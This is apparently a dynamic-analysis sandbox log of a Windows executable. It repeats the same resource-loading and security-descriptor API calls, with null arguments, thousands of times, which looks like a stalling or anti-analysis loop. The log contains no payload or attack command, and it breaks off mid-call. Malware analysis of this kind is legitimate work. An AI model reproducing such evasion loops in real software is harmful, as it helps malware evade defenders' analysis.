[0069.936] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.936] LockResource (hResData=0x0) returned 0x0 [0069.936] FreeResource (hResData=0x0) returned 0 [0069.936] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.936] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.936] LockResource (hResData=0x0) returned 0x0 [0069.936] FreeResource (hResData=0x0) returned 0 [0069.936] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.936] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.936] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.936] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.936] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.936] LockResource (hResData=0x0) returned 0x0 [0069.936] FreeResource (hResData=0x0) returned 0 [0069.936] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.936] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.936] LockResource (hResData=0x0) returned 0x0 [0069.936] FreeResource (hResData=0x0) returned 0 [0069.936] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.936] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.936] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.936] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.936] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.936] LockResource (hResData=0x0) returned 0x0 [0069.936] FreeResource (hResData=0x0) returned 0 [0069.936] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.936] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.937] LockResource (hResData=0x0) returned 0x0 [0069.937] FreeResource (hResData=0x0) returned 0 [0069.937] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.937] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.937] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.937] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.937] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.937] LockResource (hResData=0x0) returned 0x0 [0069.937] FreeResource (hResData=0x0) returned 0 [0069.937] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.937] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.937] LockResource (hResData=0x0) returned 0x0 [0069.937] FreeResource (hResData=0x0) returned 0 [0069.937] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.937] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.937] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.937] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.937] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.937] LockResource (hResData=0x0) returned 0x0 [0069.937] FreeResource (hResData=0x0) returned 0 [0069.937] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.937] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.937] LockResource (hResData=0x0) returned 0x0 [0069.937] FreeResource (hResData=0x0) returned 0 [0069.937] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.937] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.937] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.937] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.937] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.937] LockResource (hResData=0x0) returned 0x0 [0069.937] FreeResource (hResData=0x0) returned 0 [0069.937] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.937] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.937] LockResource (hResData=0x0) returned 0x0 [0069.937] FreeResource (hResData=0x0) returned 0 [0069.937] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.937] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.937] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.937] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.937] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.937] LockResource (hResData=0x0) returned 0x0 [0069.937] FreeResource (hResData=0x0) returned 0 [0069.937] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.937] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.937] LockResource (hResData=0x0) returned 0x0 [0069.938] FreeResource (hResData=0x0) returned 0 [0069.938] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.938] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.938] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.938] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.938] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.938] LockResource (hResData=0x0) returned 0x0 [0069.938] FreeResource (hResData=0x0) returned 0 [0069.938] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.938] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.938] LockResource (hResData=0x0) returned 0x0 [0069.938] FreeResource (hResData=0x0) returned 0 [0069.938] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.938] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.938] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.938] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.938] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.938] LockResource (hResData=0x0) returned 0x0 [0069.938] FreeResource (hResData=0x0) returned 0 [0069.938] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.938] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.938] LockResource (hResData=0x0) returned 0x0 [0069.938] FreeResource (hResData=0x0) returned 0 [0069.938] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.938] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.938] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.938] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.938] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.938] LockResource (hResData=0x0) returned 0x0 [0069.938] FreeResource (hResData=0x0) returned 0 [0069.938] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.938] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.938] LockResource (hResData=0x0) returned 0x0 [0069.938] FreeResource (hResData=0x0) returned 0 [0069.938] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.938] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.938] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.938] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.938] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.938] LockResource (hResData=0x0) returned 0x0 [0069.938] FreeResource (hResData=0x0) returned 0 [0069.938] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.938] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.938] LockResource (hResData=0x0) returned 0x0 [0069.938] FreeResource (hResData=0x0) returned 0 [0069.938] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.938] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.938] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.938] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.938] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.939] LockResource (hResData=0x0) returned 0x0 [0069.939] FreeResource (hResData=0x0) returned 0 [0069.939] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.939] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.939] LockResource (hResData=0x0) returned 0x0 [0069.939] FreeResource (hResData=0x0) returned 0 [0069.939] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.939] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.939] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.939] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.939] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.939] LockResource (hResData=0x0) returned 0x0 [0069.939] FreeResource (hResData=0x0) returned 0 [0069.939] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.939] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.939] LockResource (hResData=0x0) returned 0x0 [0069.939] FreeResource (hResData=0x0) returned 0 [0069.939] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.939] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.939] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.939] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.939] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.939] LockResource (hResData=0x0) returned 0x0 [0069.939] FreeResource (hResData=0x0) returned 0 [0069.939] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.939] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.939] LockResource (hResData=0x0) returned 0x0 [0069.939] FreeResource (hResData=0x0) returned 0 [0069.939] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.939] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.939] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.939] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.939] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.939] LockResource (hResData=0x0) returned 0x0 [0069.939] FreeResource (hResData=0x0) returned 0 [0069.939] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.939] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.939] LockResource (hResData=0x0) returned 0x0 [0069.939] FreeResource (hResData=0x0) returned 0 [0069.939] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.939] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.939] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.939] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.939] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.939] LockResource (hResData=0x0) returned 0x0 [0069.939] FreeResource (hResData=0x0) returned 0 [0069.939] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.939] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.939] LockResource (hResData=0x0) returned 0x0 [0069.939] FreeResource (hResData=0x0) returned 0 [0069.940] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.940] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.940] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.940] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.940] LockResource (hResData=0x0) returned 0x0 [0069.940] FreeResource (hResData=0x0) returned 0 [0069.940] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.940] LockResource (hResData=0x0) returned 0x0 [0069.940] FreeResource (hResData=0x0) returned 0 [0069.940] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.940] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.940] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.940] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.940] LockResource (hResData=0x0) returned 0x0 [0069.940] FreeResource (hResData=0x0) returned 0 [0069.940] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.940] LockResource (hResData=0x0) returned 0x0 [0069.940] FreeResource (hResData=0x0) returned 0 [0069.940] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.940] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.940] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.940] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.940] LockResource (hResData=0x0) returned 0x0 [0069.940] FreeResource (hResData=0x0) returned 0 [0069.940] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.940] LockResource (hResData=0x0) returned 0x0 [0069.940] FreeResource (hResData=0x0) returned 0 [0069.940] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.940] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.940] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.940] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.940] LockResource (hResData=0x0) returned 0x0 [0069.940] FreeResource (hResData=0x0) returned 0 [0069.940] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.940] LockResource (hResData=0x0) returned 0x0 [0069.940] FreeResource (hResData=0x0) returned 0 [0069.940] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.940] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.940] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.940] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.940] LockResource (hResData=0x0) returned 0x0 [0069.941] FreeResource (hResData=0x0) returned 0 [0069.941] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.941] LockResource (hResData=0x0) returned 0x0 [0069.941] FreeResource (hResData=0x0) returned 0 [0069.941] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.941] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.941] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.941] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.941] LockResource (hResData=0x0) returned 0x0 [0069.941] FreeResource (hResData=0x0) returned 0 [0069.941] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.941] LockResource (hResData=0x0) returned 0x0 [0069.941] FreeResource (hResData=0x0) returned 0 [0069.941] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.941] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.941] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.941] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.941] LockResource (hResData=0x0) returned 0x0 [0069.941] FreeResource (hResData=0x0) returned 0 [0069.941] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.941] LockResource (hResData=0x0) returned 0x0 [0069.941] FreeResource (hResData=0x0) returned 0 [0069.941] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.941] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.941] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.941] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.941] LockResource (hResData=0x0) returned 0x0 [0069.941] FreeResource (hResData=0x0) returned 0 [0069.941] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.941] LockResource (hResData=0x0) returned 0x0 [0069.941] FreeResource (hResData=0x0) returned 0 [0069.941] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.941] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.941] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.941] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.941] LockResource (hResData=0x0) returned 0x0 [0069.941] FreeResource (hResData=0x0) returned 0 [0069.941] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.941] LockResource (hResData=0x0) returned 0x0 [0069.941] FreeResource (hResData=0x0) returned 0 [0069.941] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.942] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.942] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.942] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.942] LockResource (hResData=0x0) returned 0x0 [0069.942] FreeResource (hResData=0x0) returned 0 [0069.942] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.942] LockResource (hResData=0x0) returned 0x0 [0069.942] FreeResource (hResData=0x0) returned 0 [0069.942] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.942] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.942] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.942] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.942] LockResource (hResData=0x0) returned 0x0 [0069.942] FreeResource 